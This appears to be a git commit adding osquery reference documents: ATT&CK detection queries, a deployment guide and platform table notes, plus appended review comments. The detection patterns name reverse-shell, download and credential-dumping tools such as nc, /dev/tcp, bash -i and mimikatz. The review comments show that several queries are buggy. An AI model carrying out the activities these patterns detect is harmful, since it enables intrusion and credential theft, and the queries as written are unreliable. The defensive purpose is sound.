Initial commit

This commit is contained in:
Zhongwei Li
2025-11-29 17:51:02 +08:00
commit ff1f4bd119
252 changed files with 72682 additions and 0 deletions


@@ -0,0 +1,539 @@
# MITRE ATT&CK Detection Queries for osquery
Pre-built osquery detection queries mapped to MITRE ATT&CK techniques for threat hunting and incident response.
## Table of Contents
- [Initial Access](#initial-access)
- [Execution](#execution)
- [Persistence](#persistence)
- [Privilege Escalation](#privilege-escalation)
- [Defense Evasion](#defense-evasion)
- [Credential Access](#credential-access)
- [Discovery](#discovery)
- [Lateral Movement](#lateral-movement)
- [Collection](#collection)
- [Exfiltration](#exfiltration)
## Initial Access
### T1078 - Valid Accounts
Detect unusual account usage patterns.
```sql
-- Unusual login times or locations
SELECT username, tty, host, time
FROM last
WHERE time > (strftime('%s', 'now') - 86400)
ORDER BY time DESC;
-- Failed authentication attempts (requires auth logs)
SELECT * FROM logged_in_users WHERE user NOT IN (SELECT username FROM users);
```
### T1190 - Exploit Public-Facing Application
Detect web server exploitation indicators.
```sql
-- Web server processes spawning shells
SELECT p1.name AS webserver, p1.cmdline,
p2.name AS child_process, p2.cmdline AS child_cmdline
FROM processes p1
JOIN processes p2 ON p1.pid = p2.parent
WHERE p1.name IN ('httpd', 'nginx', 'apache2', 'w3wp.exe', 'java')
AND p2.name IN ('bash', 'sh', 'cmd.exe', 'powershell.exe', 'python', 'perl');
```
## Execution
### T1059.001 - PowerShell
Detect suspicious PowerShell execution.
```sql
SELECT pid, name, path, cmdline, parent
FROM processes
WHERE name LIKE '%powershell%'
AND (cmdline LIKE '%EncodedCommand%'
OR cmdline LIKE '%-enc%'
OR cmdline LIKE '%FromBase64String%'
OR cmdline LIKE '%Invoke-Expression%'
OR cmdline LIKE '%IEX%'
OR cmdline LIKE '%DownloadString%'
OR cmdline LIKE '%-w hidden%'
OR cmdline LIKE '%-WindowStyle hidden%');
```
### T1059.003 - Windows Command Shell
Detect suspicious cmd.exe usage.
```sql
SELECT pid, name, path, cmdline, parent
FROM processes
WHERE name = 'cmd.exe'
AND (cmdline LIKE '%/c%'
OR cmdline LIKE '%&%'
OR cmdline LIKE '%|%'
OR cmdline LIKE '%<%'
OR cmdline LIKE '%>%');
```
### T1059.004 - Unix Shell
Detect suspicious shell execution.
```sql
SELECT pid, name, path, cmdline, parent, uid
FROM processes
WHERE name IN ('bash', 'sh', 'zsh', 'ksh')
AND (cmdline LIKE '%curl%http%'
OR cmdline LIKE '%wget%http%'
OR cmdline LIKE '%nc%'
OR cmdline LIKE '%netcat%'
OR cmdline LIKE '%/dev/tcp%'
OR cmdline LIKE '%base64%');
```
### T1053 - Scheduled Task/Job
Detect suspicious scheduled tasks.
```sql
-- Suspicious cron jobs (Linux/macOS)
SELECT command, path, minute, hour
FROM crontab
WHERE command LIKE '%curl%'
OR command LIKE '%wget%'
OR command LIKE '%/tmp/%'
OR command LIKE '%bash -i%'
OR command LIKE '%python -c%';
-- Suspicious scheduled tasks (Windows)
SELECT name, action, path, enabled
FROM scheduled_tasks
WHERE enabled = 1
AND (action LIKE '%powershell%'
OR action LIKE '%cmd%'
OR action LIKE '%wscript%'
OR action LIKE '%mshta%');
```
## Persistence
### T1547.001 - Registry Run Keys (Windows)
Detect persistence via registry.
```sql
SELECT key, name, path, data
FROM registry
WHERE (key LIKE '%\\Run' OR key LIKE '%\\RunOnce')
AND (data LIKE '%AppData%'
OR data LIKE '%Temp%'
OR data LIKE '%ProgramData%'
OR data LIKE '%.vbs'
OR data LIKE '%.js');
```
### T1547.006 - Kernel Modules and Extensions
Detect unauthorized kernel modules.
```sql
-- Linux kernel modules
SELECT name, size, used_by, status
FROM kernel_modules
WHERE name NOT IN (
'ip_tables', 'x_tables', 'nf_conntrack', 'nf_defrag_ipv4',
'iptable_filter', 'iptable_nat', 'ipt_MASQUERADE'
);
-- macOS kernel extensions
SELECT name, version, path
FROM kernel_extensions
WHERE loaded = 1
AND path NOT LIKE '/System/%'
AND path NOT LIKE '/Library/Extensions/%';
```
### T1053.003 - Cron (Linux/macOS)
Detect malicious cron jobs.
```sql
SELECT event, command, path, minute, hour, day_of_week
FROM crontab
WHERE command LIKE '%curl%http%'
OR command LIKE '%wget%http%'
OR command LIKE '%bash -i%'
OR command LIKE '%python%socket%'
OR command LIKE '%nc%'
OR command LIKE '%/dev/tcp%'
OR path LIKE '%/tmp/%'
OR path LIKE '%/var/tmp/%';
```
### T1543.002 - Systemd Service (Linux)
Detect malicious systemd services.
```sql
SELECT name, fragment_path, description, active_state
FROM systemd_units
WHERE active_state = 'active'
AND fragment_path NOT LIKE '/usr/lib/systemd/system/%'
AND fragment_path NOT LIKE '/lib/systemd/system/%';
```
## Privilege Escalation
### T1548.003 - Sudo and Sudo Caching
Detect sudo abuse.
```sql
SELECT pid, name, cmdline, uid, euid, parent
FROM processes
WHERE name = 'sudo'
AND (cmdline LIKE '%-i%'
OR cmdline LIKE '%-s%'
OR cmdline LIKE '%-u root%');
```
### T1548.001 - Setuid and Setgid
Find suspicious SUID/SGID binaries.
```sql
SELECT path, filename, mode, uid, gid
FROM file
WHERE (mode LIKE '%4%' OR mode LIKE '%2%')
AND (path LIKE '/tmp/%'
OR path LIKE '/var/tmp/%'
OR path LIKE '/home/%'
OR path LIKE '/dev/shm/%');
```
### T1543.001 - Launch Agent (macOS)
Detect malicious launch agents.
```sql
SELECT name, path, program, program_arguments, run_at_load
FROM launchd
WHERE run_at_load = 1
AND (path LIKE '%/tmp/%'
OR path LIKE '%/Users/%/Library/LaunchAgents/%'
OR program LIKE '%curl%'
OR program LIKE '%bash%');
```
## Defense Evasion
### T1055 - Process Injection
Detect process injection techniques.
```sql
-- Windows process injection indicators
SELECT pid, name, path, cmdline
FROM processes
WHERE cmdline LIKE '%VirtualAllocEx%'
OR cmdline LIKE '%WriteProcessMemory%'
OR cmdline LIKE '%CreateRemoteThread%'
OR cmdline LIKE '%QueueUserAPC%'
OR cmdline LIKE '%SetThreadContext%';
-- Processes with deleted executables (Linux indicator)
SELECT pid, name, path, cmdline, parent
FROM processes
WHERE on_disk = 0;
```
### T1070.004 - File Deletion
Detect log and evidence deletion.
```sql
SELECT pid, name, cmdline, path
FROM processes
WHERE (cmdline LIKE '%rm%'
OR cmdline LIKE '%del%'
OR cmdline LIKE '%shred%'
OR cmdline LIKE '%wipe%')
AND (cmdline LIKE '%log%'
OR cmdline LIKE '%audit%'
OR cmdline LIKE '%history%'
OR cmdline LIKE '%bash_history%');
```
### T1027 - Obfuscated Files or Information
Detect encoding and obfuscation.
```sql
SELECT pid, name, path, cmdline
FROM processes
WHERE cmdline LIKE '%base64%'
OR cmdline LIKE '%certutil%decode%'
OR cmdline LIKE '%[Convert]::FromBase64String%'
OR cmdline LIKE '%openssl enc%'
OR cmdline LIKE '%uuencode%';
```
### T1564.001 - Hidden Files and Directories
Find hidden files in unusual locations.
```sql
SELECT path, filename, size, mtime
FROM file
WHERE filename LIKE '.%'
AND (path LIKE '/tmp/%'
OR path LIKE '/var/tmp/%'
OR path LIKE '/dev/shm/%')
AND size > 0;
```
## Credential Access
### T1003.001 - LSASS Memory (Windows)
Detect LSASS dumping.
```sql
SELECT pid, name, path, cmdline, parent
FROM processes
WHERE name IN ('mimikatz.exe', 'procdump.exe', 'pwdump.exe')
OR cmdline LIKE '%sekurlsa%'
OR cmdline LIKE '%lsadump%'
OR cmdline LIKE '%procdump%lsass%'
OR cmdline LIKE '%comsvcs.dll%MiniDump%';
```
### T1003.008 - /etc/passwd and /etc/shadow
Detect access to credential files.
```sql
-- Processes accessing password files
SELECT p.name, p.cmdline, pm.path
FROM processes p
JOIN process_memory_map pm ON p.pid = pm.pid
WHERE pm.path IN ('/etc/shadow', '/etc/passwd', '/etc/master.passwd')
AND p.name NOT IN ('sshd', 'login', 'su', 'sudo');
```
### T1552.001 - Credentials in Files
Search for credential files.
```sql
SELECT path, filename, size
FROM file
WHERE (filename LIKE '%password%'
OR filename LIKE '%credential%'
OR filename LIKE '%secret%'
OR filename LIKE '%.pem'
OR filename LIKE '%.key'
OR filename = '.bash_history'
OR filename = '.zsh_history')
AND path LIKE '/home/%';
```
## Discovery
### T1057 - Process Discovery
Detect process enumeration.
```sql
SELECT pid, name, cmdline, parent
FROM processes
WHERE cmdline LIKE '%ps aux%'
OR cmdline LIKE '%tasklist%'
OR cmdline LIKE '%Get-Process%'
OR name IN ('ps', 'tasklist.exe');
```
### T1082 - System Information Discovery
Detect system reconnaissance.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%systeminfo%'
OR cmdline LIKE '%uname -a%'
OR cmdline LIKE '%Get-ComputerInfo%'
OR cmdline LIKE '%hostnamectl%'
OR cmdline LIKE '%sw_vers%';
```
### T1083 - File and Directory Discovery
Detect file enumeration.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%find%'
OR cmdline LIKE '%dir /s%'
OR cmdline LIKE '%ls -la%'
OR cmdline LIKE '%Get-ChildItem%';
```
### T1087 - Account Discovery
Detect account enumeration.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%net user%'
OR cmdline LIKE '%net group%'
OR cmdline LIKE '%net localgroup%'
OR cmdline LIKE '%Get-LocalUser%'
OR cmdline LIKE '%whoami%'
OR cmdline LIKE '%id%';
```
### T1046 - Network Service Scanning
Detect network scanning activity.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%nmap%'
OR cmdline LIKE '%masscan%'
OR cmdline LIKE '%netcat%'
OR cmdline LIKE '%nc%'
OR name IN ('nmap', 'masscan', 'nc', 'netcat');
```
## Lateral Movement
### T1021.001 - Remote Desktop Protocol
Detect RDP connections.
```sql
SELECT p.pid, p.name, p.cmdline, ps.remote_address, ps.remote_port
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.remote_port = 3389
OR p.name LIKE '%mstsc%'
OR p.name LIKE '%rdp%';
```
### T1021.002 - SMB/Windows Admin Shares
Detect SMB lateral movement.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%\\\\%\\admin$%'
OR cmdline LIKE '%\\\\%\\c$%'
OR cmdline LIKE '%net use%'
OR cmdline LIKE '%PsExec%';
```
### T1021.004 - SSH
Detect SSH lateral movement.
```sql
-- Outbound SSH connections
SELECT p.pid, p.name, p.cmdline, ps.remote_address, ps.remote_port
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.remote_port = 22
AND p.name = 'ssh';
-- Unusual SSH sessions
SELECT user, tty, host, time
FROM logged_in_users
WHERE tty LIKE 'pts/%'
AND user NOT IN ('root', 'admin');
```
## Collection
### T1560.001 - Archive via Utility
Detect data archiving for staging.
```sql
SELECT pid, name, cmdline, path
FROM processes
WHERE cmdline LIKE '%tar%'
OR cmdline LIKE '%zip%'
OR cmdline LIKE '%7z%'
OR cmdline LIKE '%rar%'
OR cmdline LIKE '%Compress-Archive%';
```
### T1119 - Automated Collection
Detect automated data collection scripts.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE (cmdline LIKE '%find%'
OR cmdline LIKE '%grep%'
OR cmdline LIKE '%Select-String%')
AND (cmdline LIKE '%password%'
OR cmdline LIKE '%credential%'
OR cmdline LIKE '%secret%'
OR cmdline LIKE '%.doc%'
OR cmdline LIKE '%.xls%');
```
## Exfiltration
### T1041 - Exfiltration Over C2 Channel
Detect suspicious network connections.
```sql
-- Unusual outbound connections
SELECT p.name, p.cmdline, ps.remote_address, ps.remote_port, ps.protocol
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.remote_address NOT IN ('127.0.0.1', '::1')
AND ps.remote_port NOT IN (80, 443, 22, 53, 3389)
AND ps.state = 'ESTABLISHED';
```
### T1048.003 - Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Detect data exfiltration via common tools.
```sql
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%curl%'
OR cmdline LIKE '%wget%'
OR cmdline LIKE '%scp%'
OR cmdline LIKE '%ftp%'
OR cmdline LIKE '%rsync%';
```
## Query Usage Notes
1. **Test queries** in a lab environment before production use
2. **Tune for environment** - add whitelist filters for legitimate activity
3. **Combine queries** - join multiple detections for higher confidence
4. **Time window** - add time filters to reduce result sets
5. **Baseline first** - understand normal activity before hunting
## Reference
- [MITRE ATT&CK Framework](https://attack.mitre.org/)
- [MITRE ATT&CK Techniques](https://attack.mitre.org/techniques/enterprise/)
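Review bot: the T1548.001 query `WHERE (mode LIKE '%4%' OR mode LIKE '%2%')` matches any mode string containing the digit 4 or 2 anywhere, so an ordinary `0644` file under `/home/` is reported as SUID/SGID; the setuid/setgid bits are the leading octal digit, so anchor the test to the start of the string (`mode LIKE '4%' OR mode LIKE '2%' OR mode LIKE '6%'`). Three further points in this hunk. In SQLite string literals a backslash is not an escape character, so `key LIKE '%\\Run'` in T1547.001 and the `'%\\\\%\\admin$%'` pattern in T1021.002 look for doubled backslashes that never occur in registry keys or UNC paths; write a single `\` per path separator in the `.sql` text. Several substring patterns are too broad to run as detections: `cmdline LIKE '%nc%'` (T1059.004, T1046) also matches `rsync`, `sync` and `launchd`, and `cmdline LIKE '%id%'` (T1087) matches any command line carrying a pid or uuid; anchor them to a whole word (for example `cmdline LIKE 'nc %' OR cmdline LIKE '% nc %'`). Finally, the comment `-- Failed authentication attempts (requires auth logs)` in T1078 does not describe the query beneath it, which lists logged-in sessions whose `user` is absent from `users`; either drop the comment or replace the query with one against a table that holds authentication events.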


@@ -0,0 +1,518 @@
# osqueryd Deployment Guide
Deploy osqueryd for continuous endpoint monitoring, detection, and forensic evidence collection at scale.
## Table of Contents
- [Overview](#overview)
- [Installation](#installation)
- [Configuration](#configuration)
- [Query Packs](#query-packs)
- [Log Management](#log-management)
- [Fleet Management](#fleet-management)
- [Performance Tuning](#performance-tuning)
## Overview
osqueryd is the daemon component of osquery that enables:
- Scheduled query execution across endpoint fleet
- Real-time event monitoring with event tables
- Centralized log collection and aggregation
- Detection-as-code with versioned query packs
## Installation
### Linux (Ubuntu/Debian)
```bash
# Add osquery repository
export OSQUERY_KEY=1484120AC4E9F8A1A577AEEE97A80C63C9D8B80B
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys $OSQUERY_KEY
# Add repository
sudo add-apt-repository 'deb [arch=amd64] https://pkg.osquery.io/deb deb main'
# Install
sudo apt update
sudo apt install osquery
```
### Linux (RHEL/CentOS)
```bash
# Add osquery repository
curl -L https://pkg.osquery.io/rpm/GPG | sudo tee /etc/pki/rpm-gpg/RPM-GPG-KEY-osquery
# Add repository
sudo yum-config-manager --add-repo https://pkg.osquery.io/rpm/osquery-s3-rpm.repo
# Install
sudo yum install osquery
```
### macOS
```bash
# Using Homebrew
brew install osquery
# Or download official PKG installer
# https://pkg.osquery.io/darwin/osquery-<version>.pkg
```
### Windows
```powershell
# Download MSI installer
# https://pkg.osquery.io/windows/osquery-<version>.msi
# Install via PowerShell
msiexec /i osquery-<version>.msi /quiet
```
## Configuration
### Configuration File Location
- Linux: `/etc/osquery/osquery.conf`
- macOS: `/var/osquery/osquery.conf`
- Windows: `C:\Program Files\osquery\osquery.conf`
### Basic Configuration
```json
{
"options": {
"config_plugin": "filesystem",
"logger_plugin": "filesystem",
"logger_path": "/var/log/osquery",
"disable_logging": false,
"log_result_events": true,
"schedule_splay_percent": 10,
"pidfile": "/var/osquery/osquery.pidfile",
"events_expiry": 3600,
"database_path": "/var/osquery/osquery.db",
"verbose": false,
"worker_threads": 2,
"enable_monitor": true,
"disable_events": false,
"disable_audit": false,
"audit_allow_config": true,
"audit_allow_sockets": true,
"host_identifier": "hostname",
"enable_syslog": false,
"syslog_pipe_path": "/var/osquery/syslog_pipe"
},
"schedule": {
"system_info": {
"query": "SELECT * FROM system_info;",
"interval": 3600,
"description": "Collect system information hourly"
},
"running_processes": {
"query": "SELECT pid, name, path, cmdline, uid FROM processes;",
"interval": 300,
"description": "Monitor running processes every 5 minutes"
},
"network_connections": {
"query": "SELECT p.name, p.cmdline, ps.remote_address, ps.remote_port FROM processes p JOIN process_open_sockets ps ON p.pid = ps.pid WHERE ps.remote_address NOT IN ('127.0.0.1', '::1');",
"interval": 600,
"description": "Monitor network connections every 10 minutes"
}
},
"packs": {
"incident-response": "/etc/osquery/packs/ir-triage.conf",
"ossec-rootkit": "/usr/share/osquery/packs/ossec-rootkit.conf"
}
}
```
### Security-Focused Configuration
```json
{
"options": {
"config_plugin": "filesystem",
"logger_plugin": "filesystem",
"logger_path": "/var/log/osquery",
"disable_logging": false,
"log_result_events": true,
"schedule_splay_percent": 10,
"worker_threads": 4,
"enable_monitor": true,
"watchdog_level": 1,
"watchdog_memory_limit": 250,
"watchdog_utilization_limit": 20
},
"schedule": {
"suspicious_processes": {
"query": "SELECT * FROM processes WHERE on_disk = 0 OR path LIKE '%tmp%' OR path LIKE '%Temp%';",
"interval": 300,
"description": "Detect suspicious processes"
},
"unauthorized_suid": {
"query": "SELECT path, mode, uid FROM file WHERE (mode LIKE '%4%' OR mode LIKE '%2%') AND path NOT IN (SELECT path FROM file WHERE path LIKE '/usr/%' OR path LIKE '/bin/%');",
"interval": 3600,
"description": "Find unauthorized SUID binaries",
"platform": "posix"
},
"registry_run_keys": {
"query": "SELECT key, name, path FROM registry WHERE key LIKE '%Run%' OR key LIKE '%RunOnce%';",
"interval": 3600,
"description": "Monitor registry persistence",
"platform": "windows"
}
}
}
```
## Query Packs
### Creating Query Packs
Query packs organize related queries for specific security scenarios.
**Example: `/etc/osquery/packs/ir-triage.conf`**
```json
{
"platform": "all",
"version": "1.0.0",
"queries": {
"logged_in_users": {
"query": "SELECT * FROM logged_in_users;",
"interval": 600,
"description": "Track logged-in users"
},
"listening_ports": {
"query": "SELECT lp.port, lp.address, p.name, p.path FROM listening_ports lp LEFT JOIN processes p ON lp.pid = p.pid WHERE lp.address NOT IN ('127.0.0.1', '::1');",
"interval": 300,
"description": "Monitor listening network ports"
},
"kernel_modules": {
"query": "SELECT name, used_by, status FROM kernel_modules;",
"interval": 3600,
"description": "Monitor loaded kernel modules",
"platform": "linux"
},
"scheduled_tasks": {
"query": "SELECT name, action, path, enabled FROM scheduled_tasks WHERE enabled = 1;",
"interval": 3600,
"description": "Monitor Windows scheduled tasks",
"platform": "windows"
},
"launchd_services": {
"query": "SELECT name, path, program, run_at_load FROM launchd WHERE run_at_load = 1;",
"interval": 3600,
"description": "Monitor macOS launch services",
"platform": "darwin"
}
}
}
```
### Platform-Specific Packs
Use `"platform"` field to limit queries:
- `"posix"` - Linux and macOS
- `"linux"` - Linux only
- `"darwin"` - macOS only
- `"windows"` - Windows only
- `"all"` - All platforms
## Log Management
### Log Types
osqueryd generates several log types:
1. **Result logs**: Query results from scheduled queries
2. **Status logs**: osqueryd operational status and errors
3. **Snapshot logs**: Full result sets (vs differential)
### Log Formats
**JSON (recommended):**
```json
{
"name": "suspicious_processes",
"hostIdentifier": "web-server-01",
"calendarTime": "Mon Oct 02 12:34:56 2023 UTC",
"unixTime": 1696251296,
"epoch": 0,
"counter": 1,
"columns": {
"pid": "1234",
"name": "suspicious",
"path": "/tmp/suspicious"
},
"action": "added"
}
```
### Centralized Logging
#### Option 1: Syslog
```json
{
"options": {
"logger_plugin": "syslog",
"syslog_pipe_path": "/var/osquery/syslog_pipe"
}
}
```
#### Option 2: AWS Kinesis/Firehose
```json
{
"options": {
"logger_plugin": "aws_kinesis",
"aws_kinesis_stream": "osquery-results",
"aws_region": "us-east-1"
}
}
```
#### Option 3: TLS Endpoint
```json
{
"options": {
"logger_plugin": "tls",
"logger_tls_endpoint": "/log",
"logger_tls_period": 60
}
}
```
#### Option 4: Kafka
```json
{
"options": {
"logger_plugin": "kafka_producer",
"kafka_topic": "osquery-logs",
"kafka_brokers": "broker1:9092,broker2:9092"
}
}
```
## Fleet Management
### Fleet Manager Options
1. **osquery Fleet Manager** - Official fleet management tool
2. **Kolide Fleet** - Open-source fleet management (now FleetDM)
3. **Doorman** - Minimal fleet manager
4. **Zentral** - macOS-focused fleet management
### FleetDM Configuration
```yaml
# fleet-config.yml
mysql:
address: 127.0.0.1:3306
database: fleet
username: fleet
password: fleet_password
redis:
address: 127.0.0.1:6379
server:
address: 0.0.0.0:8080
tls: true
cert: /path/to/cert.pem
key: /path/to/key.pem
logging:
json: true
debug: false
```
### Enrolling Endpoints
#### TLS Enrollment
```json
{
"options": {
"enroll_secret_path": "/etc/osquery/enroll_secret.txt",
"tls_server_certs": "/etc/osquery/certs/server.pem",
"tls_hostname": "fleet.example.com",
"host_identifier": "uuid",
"enroll_tls_endpoint": "/api/v1/osquery/enroll",
"config_plugin": "tls",
"config_tls_endpoint": "/api/v1/osquery/config",
"config_refresh": 60,
"logger_plugin": "tls",
"logger_tls_endpoint": "/api/v1/osquery/log",
"logger_tls_period": 10,
"distributed_plugin": "tls",
"distributed_interval": 60,
"distributed_tls_read_endpoint": "/api/v1/osquery/distributed/read",
"distributed_tls_write_endpoint": "/api/v1/osquery/distributed/write"
}
}
```
## Performance Tuning
### Resource Limits
```json
{
"options": {
"watchdog_level": 1,
"watchdog_memory_limit": 250,
"watchdog_utilization_limit": 20,
"worker_threads": 4,
"schedule_timeout": 60,
"schedule_max_drift": 60
}
}
```
### Query Optimization
1. **Use appropriate intervals**: Balance freshness vs performance
- Critical queries: 60-300 seconds
- Standard monitoring: 300-900 seconds
- Inventory queries: 3600+ seconds
2. **Add WHERE clauses**: Reduce result set size
```sql
-- Bad: SELECT * FROM file;
-- Good: SELECT * FROM file WHERE path LIKE '/etc/%';
```
3. **Limit result sets**: Use LIMIT clause
```sql
SELECT * FROM processes ORDER BY start_time DESC LIMIT 100;
```
4. **Differential logging**: Only log changes
```json
{
"options": {
"log_result_events": true
}
}
```
### Schedule Splay
Prevent query storms by adding jitter:
```json
{
"options": {
"schedule_splay_percent": 10
}
}
```
## Service Management
### Linux (systemd)
```bash
# Start osqueryd
sudo systemctl start osqueryd
# Enable on boot
sudo systemctl enable osqueryd
# Check status
sudo systemctl status osqueryd
# View logs
sudo journalctl -u osqueryd -f
```
### macOS (launchd)
```bash
# Start osqueryd
sudo launchctl load /Library/LaunchDaemons/com.facebook.osqueryd.plist
# Stop osqueryd
sudo launchctl unload /Library/LaunchDaemons/com.facebook.osqueryd.plist
# Check status
sudo launchctl list | grep osquery
```
### Windows (Service)
```powershell
# Start service
Start-Service osqueryd
# Stop service
Stop-Service osqueryd
# Check status
Get-Service osqueryd
# View logs
Get-Content "C:\ProgramData\osquery\log\osqueryd.results.log" -Wait
```
## Security Best Practices
1. **Limit configuration access**: Restrict `/etc/osquery/` to root only
2. **Use TLS**: Encrypt fleet management communications
3. **Rotate secrets**: Change enrollment secrets regularly
4. **Monitor osqueryd**: Alert on service failures
5. **Version control configs**: Track configuration changes in Git
6. **Test before deploy**: Validate queries in lab first
7. **Implement RBAC**: Use fleet manager role-based access
8. **Audit queries**: Review all scheduled queries for performance impact
## Troubleshooting
### High CPU Usage
Check query performance:
```bash
# Enable verbose logging
sudo osqueryd --verbose --config_path=/etc/osquery/osquery.conf
# Check query times
tail -f /var/log/osquery/osqueryd.INFO | grep "query="
```
### Missing Results
Verify query syntax:
```bash
# Test query interactively
osqueryi "SELECT * FROM processes LIMIT 5;"
# Check for errors
tail -f /var/log/osquery/osqueryd.results.log
```
### Service Crashes
Review watchdog settings:
```json
{
"options": {
"watchdog_level": 0, # Disable for debugging
"verbose": true
}
}
```
## Reference
- [osquery Deployment Guide](https://osquery.readthedocs.io/en/stable/deployment/)
- [FleetDM Documentation](https://fleetdm.com/docs)
- [osquery Configuration](https://osquery.readthedocs.io/en/stable/deployment/configuration/)
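Review bot: the `unauthorized_suid` query in the Security-Focused Configuration runs `SELECT path, mode, uid FROM file WHERE (mode LIKE '%4%' OR mode LIKE '%2%') AND path NOT IN (...)` with no `path` or `directory` constraint on the outer `file` table; osquery's `file` table requires one and returns no rows without it, and the subquery's `path LIKE '/usr/%'` only matches entries one level below `/usr`, so this scheduled query will silently log nothing. Constrain it (for example `WHERE directory IN ('/tmp', '/var/tmp', '/dev/shm')`, or `path LIKE '/home/%%'` for a recursive walk) and anchor the mode test to the leading octal digit (`mode LIKE '4%' OR mode LIKE '2%' OR mode LIKE '6%'`). Three smaller points: the Service Crashes snippet `"watchdog_level": 0, # Disable for debugging` is not valid JSON, so the remark belongs in the prose above the block; `apt-key adv --keyserver keyserver.ubuntu.com --recv-keys $OSQUERY_KEY` is deprecated on current Debian and Ubuntu releases, so the key should be saved to a keyring file and referenced with `signed-by=` in the `deb` line; and `password: fleet_password` in `fleet-config.yml` contradicts the "Rotate secrets" item in Security Best Practices, so the example should read it from the environment (`FLEET_MYSQL_PASSWORD`) rather than the committed file.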


@@ -0,0 +1,353 @@
# Platform-Specific osquery Tables and Queries
Guide to platform-specific tables and query variations across Linux, macOS, and Windows.
## Table of Contents
- [Cross-Platform Tables](#cross-platform-tables)
- [Linux-Specific Tables](#linux-specific-tables)
- [macOS-Specific Tables](#macos-specific-tables)
- [Windows-Specific Tables](#windows-specific-tables)
- [Query Translation Examples](#query-translation-examples)
## Cross-Platform Tables
These tables work across all platforms with consistent schemas:
- `processes` - Running processes
- `users` - User accounts
- `groups` - User groups
- `file` - File system metadata
- `hash` - File hashing
- `system_info` - System information
- `os_version` - OS version details
- `interface_addresses` - Network interfaces
- `routes` - Routing table
- `listening_ports` - Listening network ports
## Linux-Specific Tables
### Process and System
| Table | Description |
|-------|-------------|
| `kernel_modules` | Loaded kernel modules |
| `kernel_info` | Kernel version and boot parameters |
| `memory_info` | System memory information |
| `process_namespaces` | Linux namespace information |
| `seccomp_events` | Seccomp filter events |
| `selinux_events` | SELinux audit events |
| `apparmor_events` | AppArmor audit events |
### Package Management
| Table | Description |
|-------|-------------|
| `deb_packages` | Debian/Ubuntu packages (dpkg) |
| `rpm_packages` | RPM packages (yum/dnf) |
| `portage_packages` | Gentoo Portage packages |
| `pacman_packages` | Arch Linux packages |
### Persistence
| Table | Description |
|-------|-------------|
| `crontab` | Cron scheduled jobs |
| `systemd_units` | Systemd services and units |
### Example Linux Queries
```sql
-- Check kernel modules
SELECT name, size, used_by, status FROM kernel_modules;
-- Active systemd services
SELECT id, description, active_state, fragment_path
FROM systemd_units
WHERE active_state = 'active';
-- Recently installed packages (Debian/Ubuntu)
SELECT name, version, install_time
FROM deb_packages
ORDER BY install_time DESC LIMIT 20;
-- SELinux denials
SELECT * FROM selinux_events WHERE denied = 1;
```
## macOS-Specific Tables
### System and Kernel
| Table | Description |
|-------|-------------|
| `kernel_extensions` | Loaded kernel extensions (kexts) |
| `system_extensions` | macOS system extensions |
| `signature` | Code signature verification |
| `quarantine` | Quarantine database entries |
### Persistence
| Table | Description |
|-------|-------------|
| `launchd` | Launch agents and daemons |
| `startup_items` | Startup items |
| `periodic_items` | Periodic script executions |
### Applications
| Table | Description |
|-------|-------------|
| `apps` | Installed macOS applications |
| `safari_extensions` | Safari browser extensions |
| `authorization_mechanisms` | Authorization plugin mechanisms |
### Security
| Table | Description |
|-------|-------------|
| `extended_attributes` | File extended attributes (xattr) |
| `keychain_items` | macOS Keychain items |
| `firewall` | macOS firewall settings |
### Example macOS Queries
```sql
-- Launch agents that run at load
SELECT name, path, program, program_arguments, run_at_load
FROM launchd
WHERE run_at_load = 1
AND path NOT LIKE '/System/%';
-- Loaded kernel extensions
SELECT name, version, path, linked_against
FROM kernel_extensions
WHERE loaded = 1;
-- Quarantined files
SELECT path, description, data_url
FROM quarantine
WHERE path LIKE '/Users/%/Downloads/%';
-- Unsigned executables in Applications
SELECT path, signed FROM signature
WHERE path LIKE '/Applications/%' AND signed = 0;
-- Code signing status
SELECT path, authority, signed, identifier
FROM signature
WHERE path = '/Applications/Suspicious.app/Contents/MacOS/Suspicious';
```
## Windows-Specific Tables
### System and Registry
| Table | Description |
|-------|-------------|
| `registry` | Windows registry access |
| `drivers` | Device drivers |
| `services` | Windows services |
| `wmi_cli_event_consumers` | WMI event consumers |
| `wmi_filter_consumer_binding` | WMI filter bindings |
### Persistence
| Table | Description |
|-------|-------------|
| `scheduled_tasks` | Windows scheduled tasks |
| `autoexec` | Auto-execution entries |
| `startup_items` | Startup folder items |
### Security
| Table | Description |
|-------|-------------|
| `windows_eventlog` | Windows Event Log |
| `authenticode` | Authenticode signature verification |
| `windows_security_products` | Installed security products |
| `bitlocker_info` | BitLocker encryption status |
### Processes
| Table | Description |
|-------|-------------|
| `process_memory_map` | Process memory mappings |
| `process_handles` | Open process handles |
### Example Windows Queries
```sql
-- Registry Run keys
SELECT key, name, path, data, mtime
FROM registry
WHERE (key LIKE '%\\Run' OR key LIKE '%\\RunOnce')
AND key NOT LIKE '%\\RunOnceEx';
-- Scheduled tasks
SELECT name, action, path, enabled, last_run_time, next_run_time
FROM scheduled_tasks
WHERE enabled = 1
ORDER BY next_run_time;
-- WMI persistence
SELECT name, command_line_template, executable_path
FROM wmi_cli_event_consumers;
-- Windows services
SELECT name, display_name, status, path, start_type, user_account
FROM services
WHERE start_type IN ('AUTO_START', 'DEMAND_START')
ORDER BY status;
-- Event log security events
SELECT datetime, eventid, source, data
FROM windows_eventlog
WHERE channel = 'Security'
AND eventid IN (4624, 4625, 4648, 4672)
ORDER BY datetime DESC LIMIT 100;
-- Authenticode signature verification
SELECT path, result, subject_name, issuer_name
FROM authenticode
WHERE path LIKE 'C:\Users\%'
AND result != 'trusted';
```
## Query Translation Examples
### Persistence Mechanisms
**Linux:**
```sql
-- Cron jobs
SELECT * FROM crontab;
-- Systemd services
SELECT name, fragment_path, active_state
FROM systemd_units
WHERE active_state = 'active';
```
**macOS:**
```sql
-- Launch agents/daemons
SELECT name, path, program, run_at_load
